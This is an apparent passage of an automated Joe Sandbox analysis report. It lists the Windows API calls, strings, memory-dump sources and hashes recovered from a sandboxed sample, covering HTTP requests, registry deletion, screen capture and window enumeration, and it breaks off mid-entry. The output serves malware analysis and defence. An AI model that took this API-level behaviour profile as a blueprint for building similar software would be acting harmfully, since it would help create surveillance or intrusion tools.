                                                                • Instruction Fuzzy Hash: 43717870144284AFDB21CF18DC48EAABBF9FBCA304F48455EF999872A1C778E905CB15
                                                                APIs
                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0078C4B0
                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0078C4C3
                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0078C4D7
                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0078C4F0
                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0078C533
                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0078C549
                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0078C554
                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0078C584
                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0078C5DC
                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0078C5F0
                                                                • InternetCloseHandle.WININET(00000000), ref: 0078C5FB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                • String ID:
                                                                • API String ID: 3800310941-3916222277
                                                                • Opcode ID: 56a2a935119f150ffdd9e2b23bebb6ad14a637bc9e0ce92b2c93dd8199a7d923
                                                                • Instruction ID: fc7d3826c9b263824a7f1fea31687b5a0b84e9babcc1f2cb0fc8a34edb93df34
                                                                • Opcode Fuzzy Hash: 56a2a935119f150ffdd9e2b23bebb6ad14a637bc9e0ce92b2c93dd8199a7d923
                                                                • Instruction Fuzzy Hash: 75516EB1540204BFEB22AF60C948ABB7BFCFF49754F108419F94596250DB38E954DB70
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 007A8592
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85A2
                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85AD
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85BA
                                                                • GlobalLock.KERNEL32(00000000), ref: 007A85C8
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85D7
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 007A85E0
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85E7
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007A85F8
                                                                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,007AFC38,?), ref: 007A8611
                                                                • GlobalFree.KERNEL32(00000000), ref: 007A8621
                                                                • GetObjectW.GDI32(?,00000018,?), ref: 007A8641
                                                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 007A8671
                                                                • DeleteObject.GDI32(?), ref: 007A8699
                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007A86AF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                • String ID:
                                                                • API String ID: 3840717409-0
                                                                • Opcode ID: 201d3b6513a259901d43bffa495593dd8f07e07b96a4666cbd01ff112ad35f38
                                                                • Instruction ID: 15e5fc193d8c7b011943669548eb765e01080317df1699e9f726980c15e7f308
                                                                • Opcode Fuzzy Hash: 201d3b6513a259901d43bffa495593dd8f07e07b96a4666cbd01ff112ad35f38
                                                                • Instruction Fuzzy Hash: 5C41FA75600208FFDB129FA5DC48EAA7BB8FF8A711F148158F905E7260DB389901CB65
                                                                APIs
                                                                • VariantInit.OLEAUT32(00000000), ref: 00781502
                                                                • VariantCopy.OLEAUT32(?,?), ref: 0078150B
                                                                • VariantClear.OLEAUT32(?), ref: 00781517
                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 007815FB
                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 00781657
                                                                • VariantInit.OLEAUT32(?), ref: 00781708
                                                                • SysFreeString.OLEAUT32(?), ref: 0078178C
                                                                • VariantClear.OLEAUT32(?), ref: 007817D8
                                                                • VariantClear.OLEAUT32(?), ref: 007817E7
                                                                • VariantInit.OLEAUT32(00000000), ref: 00781823
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                • API String ID: 1234038744-3931177956
                                                                • Opcode ID: 10c1d8e8b2d4e92ca52d0a20c0f805da855f0c73bafb8fd80aea4650f5957a79
                                                                • Instruction ID: 2d6a94b6b96e87ba7ea690f0c652f1a8e30db7b415073ed811c9e96d6b61bfdc
                                                                • Opcode Fuzzy Hash: 10c1d8e8b2d4e92ca52d0a20c0f805da855f0c73bafb8fd80aea4650f5957a79
                                                                • Instruction Fuzzy Hash: AFD12572A40115EBDB00BF65E889BBDB7B9BF46700F50805AF446AB180DB3CED52DB61
                                                                APIs
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                  • Part of subcall function 0079C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079B6AE,?,?), ref: 0079C9B5
                                                                  • Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079C9F1
                                                                  • Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA68
                                                                  • Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA9E
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0079B6F4
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0079B772
                                                                • RegDeleteValueW.ADVAPI32(?,?), ref: 0079B80A
                                                                • RegCloseKey.ADVAPI32(?), ref: 0079B87E
                                                                • RegCloseKey.ADVAPI32(?), ref: 0079B89C
                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0079B8F2
                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0079B904
                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0079B922
                                                                • FreeLibrary.KERNEL32(00000000), ref: 0079B983
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0079B994
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                • API String ID: 146587525-4033151799
                                                                • Opcode ID: 73162eff913e4a64f5db5b50fc16c062f58975c402447d9d4f1168122700280f
                                                                • Instruction ID: a4e8b71d5d10f2c5c6317a77f5065edf400ed363a5db4885f46fb191f5311599
                                                                • Opcode Fuzzy Hash: 73162eff913e4a64f5db5b50fc16c062f58975c402447d9d4f1168122700280f
                                                                • Instruction Fuzzy Hash: 4BC19F30204201EFDB14DF18E599F2ABBE5BF84314F14855CF55A4B2A2CB79EC86CB91
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 007925D8
                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 007925E8
                                                                • CreateCompatibleDC.GDI32(?), ref: 007925F4
                                                                • SelectObject.GDI32(00000000,?), ref: 00792601
                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0079266D
                                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 007926AC
                                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 007926D0
                                                                • SelectObject.GDI32(?,?), ref: 007926D8
                                                                • DeleteObject.GDI32(?), ref: 007926E1
                                                                • DeleteDC.GDI32(?), ref: 007926E8
                                                                • ReleaseDC.USER32(00000000,?), ref: 007926F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                • String ID: (
                                                                • API String ID: 2598888154-3887548279
                                                                • Opcode ID: eba35e418637472dfbba272caa52e9c9c171363b8aab7c836807c833fe297013
                                                                • Instruction ID: 7acb154ea546c7639b4f5687e10ca0bf6cbf77bf1492f15ca269d03c28f27ebf
                                                                • Opcode Fuzzy Hash: eba35e418637472dfbba272caa52e9c9c171363b8aab7c836807c833fe297013
                                                                • Instruction Fuzzy Hash: 296113B5E00219EFCF05DFA4D884AAEBBF5FF48310F208429E955A7251E734A941CF94
                                                                APIs
                                                                • ___free_lconv_mon.LIBCMT ref: 0074DAA1
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D659
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D66B
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D67D
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D68F
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6A1
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6B3
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6C5
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6D7
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6E9
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D6FB
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D70D
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D71F
                                                                  • Part of subcall function 0074D63C: _free.LIBCMT ref: 0074D731
                                                                • _free.LIBCMT ref: 0074DA96
                                                                  • Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
                                                                  • Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0
                                                                • _free.LIBCMT ref: 0074DAB8
                                                                • _free.LIBCMT ref: 0074DACD
                                                                • _free.LIBCMT ref: 0074DAD8
                                                                • _free.LIBCMT ref: 0074DAFA
                                                                • _free.LIBCMT ref: 0074DB0D
                                                                • _free.LIBCMT ref: 0074DB1B
                                                                • _free.LIBCMT ref: 0074DB26
                                                                • _free.LIBCMT ref: 0074DB5E
                                                                • _free.LIBCMT ref: 0074DB65
                                                                • _free.LIBCMT ref: 0074DB82
                                                                • _free.LIBCMT ref: 0074DB9A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                • String ID:
                                                                • API String ID: 161543041-0
                                                                • Opcode ID: 2236a7c2cc877088aaad6c78fe7d9836e7d9c2afcd62775bda157e989cb610d3
                                                                • Instruction ID: d625ca373adeb312f2c68f3a5941913f580ea98a507d686cfac3a1406c6ec626
                                                                • Opcode Fuzzy Hash: 2236a7c2cc877088aaad6c78fe7d9836e7d9c2afcd62775bda157e989cb610d3
                                                                • Instruction Fuzzy Hash: 2F315C71604205DFEB32AA39E849B5677E9FF00310F55442AF498E72A2DB39BC51CB20
                                                                APIs
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0077369C
                                                                • _wcslen.LIBCMT ref: 007736A7
                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00773797
                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0077380C
                                                                • GetDlgCtrlID.USER32(?), ref: 0077385D
                                                                • GetWindowRect.USER32(?,?), ref: 00773882
                                                                • GetParent.USER32(?), ref: 007738A0
                                                                • ScreenToClient.USER32(00000000), ref: 007738A7
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00773921
                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0077395D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                • String ID: %s%u
                                                                • API String ID: 4010501982-679674701
                                                                • Opcode ID: c510a8ba7c6ecd7169054301700e64104ac6f4c0a463cc0d21f7241f61b0dc81
                                                                • Instruction ID: 0a157ad61caa41298e01fbbbd8396955b7cfbd73a6417f340410c011b5642f27
                                                                • Opcode Fuzzy Hash: c510a8ba7c6ecd7169054301700e64104ac6f4c0a463cc0d21f7241f61b0dc81
                                                                • Instruction Fuzzy Hash: 9B91C671204606EFDB19DF24C885BAAF7A8FF44394F00C519FA9DC2190DB38EA55DBA1
                                                                APIs
                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00774994
                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 007749DA
                                                                • _wcslen.LIBCMT ref: 007749EB
                                                                • CharUpperBuffW.USER32(?,00000000), ref: 007749F7
                                                                • _wcsstr.LIBVCRUNTIME ref: 00774A2C
                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00774A64
                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00774A9D
                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00774AE6
                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00774B20
                                                                • GetWindowRect.USER32(?,?), ref: 00774B8B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                • String ID: ThumbnailClass
                                                                • API String ID: 1311036022-1241985126
                                                                • Opcode ID: f96af45dca0150f5a0e836ce547d0e1927cc89e45ffb26b33de5fcf54cad1f40
                                                                • Instruction ID: b80187898ff3fdcd98f2d282ea8ba80aa5dfec2051367c60f56f4bc6fe25d952
                                                                • Opcode Fuzzy Hash: f96af45dca0150f5a0e836ce547d0e1927cc89e45ffb26b33de5fcf54cad1f40
                                                                • Instruction Fuzzy Hash: 8391AC71104205AFDF05DF14C985BAAB7E8FF84394F04C46AFD899A0A6DB38ED45CBA1
                                                                APIs
                                                                  • Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2
                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007A8D5A
                                                                • GetFocus.USER32 ref: 007A8D6A
                                                                • GetDlgCtrlID.USER32(00000000), ref: 007A8D75
                                                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 007A8E1D
                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007A8ECF
                                                                • GetMenuItemCount.USER32(?), ref: 007A8EEC
                                                                • GetMenuItemID.USER32(?,00000000), ref: 007A8EFC
                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007A8F2E
                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007A8F70
                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007A8FA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                • String ID: 0
                                                                • API String ID: 1026556194-4108050209
                                                                • Opcode ID: 6ba555060f2512a83b60f7833924ee8afa5c597178dff9f10678775c75d60960
                                                                • Instruction ID: 2bd7b758730efca4f8629cfe2c7b11ceeb62cee20ac0eef4fa929ded57b2b8e8
                                                                • Opcode Fuzzy Hash: 6ba555060f2512a83b60f7833924ee8afa5c597178dff9f10678775c75d60960
                                                                • Instruction Fuzzy Hash: B981BF71508301EFDB51CF24D888AABBBE9FBCA314F144A5DF99497291DB38D900CB62
                                                                APIs
                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0077DC20
                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0077DC46
                                                                • _wcslen.LIBCMT ref: 0077DC50
                                                                • _wcsstr.LIBVCRUNTIME ref: 0077DCA0
                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0077DCBC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                • API String ID: 1939486746-1459072770
                                                                • Opcode ID: d3d737ba4d4a06131e8791f111ecb0367079efd33923ea00690bbe353e267480
                                                                • Instruction ID: 41aecd8a22fb15f4e3362651ae591b2ef1fa9607a00caf5b75987722fa640cda
                                                                • Opcode Fuzzy Hash: d3d737ba4d4a06131e8791f111ecb0367079efd33923ea00690bbe353e267480
                                                                • Instruction Fuzzy Hash: A7413872A00210BAEB25A7749C4BEBF377CEF42750F10406AF904A2183EB7D9D0197A5
                                                                APIs
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0079CC64
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0079CC8D
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0079CD48
                                                                  • Part of subcall function 0079CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0079CCAA
                                                                  • Part of subcall function 0079CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0079CCBD
                                                                  • Part of subcall function 0079CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0079CCCF
                                                                  • Part of subcall function 0079CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0079CD05
                                                                  • Part of subcall function 0079CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0079CD28
                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0079CCF3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                • API String ID: 2734957052-4033151799
                                                                • Opcode ID: 58e169e97069616d224fbc28461a152562e840171f07749c4c9fd59011c9b10a
                                                                • Instruction ID: a63672db045f136fd85fd1487ff8c56c669713044f75bb7298e0b8f5f4807505
                                                                • Opcode Fuzzy Hash: 58e169e97069616d224fbc28461a152562e840171f07749c4c9fd59011c9b10a
                                                                • Instruction Fuzzy Hash: C63160B1A01129BBDF228B54EC88EFFBB7CEF46750F004165F905E6240D6389E45DAB4
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00783D40
                                                                • _wcslen.LIBCMT ref: 00783D6D
                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00783D9D
                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00783DBE
                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00783DCE
                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00783E55
                                                                • CloseHandle.KERNEL32(00000000), ref: 00783E60
                                                                • CloseHandle.KERNEL32(00000000), ref: 00783E6B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                • String ID: :$\$\??\%s
                                                                • API String ID: 1149970189-3457252023
                                                                • Opcode ID: 6d6cc309248cf78872c0e4499fbd14f1886cceb70334834f2d1a0bc7b35b3088
                                                                • Instruction ID: 660c9a330f12500435ef8bb9b071ad2757052d5227faab6c6779f19a514d973c
